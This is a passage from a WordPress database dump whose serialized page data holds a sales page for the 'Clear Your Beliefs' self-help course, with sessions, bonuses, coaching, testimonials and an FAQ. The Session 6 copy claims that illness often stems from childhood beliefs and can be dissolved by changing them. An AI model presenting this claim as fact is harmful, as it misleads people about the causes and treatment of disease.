class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1575, 2024, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and 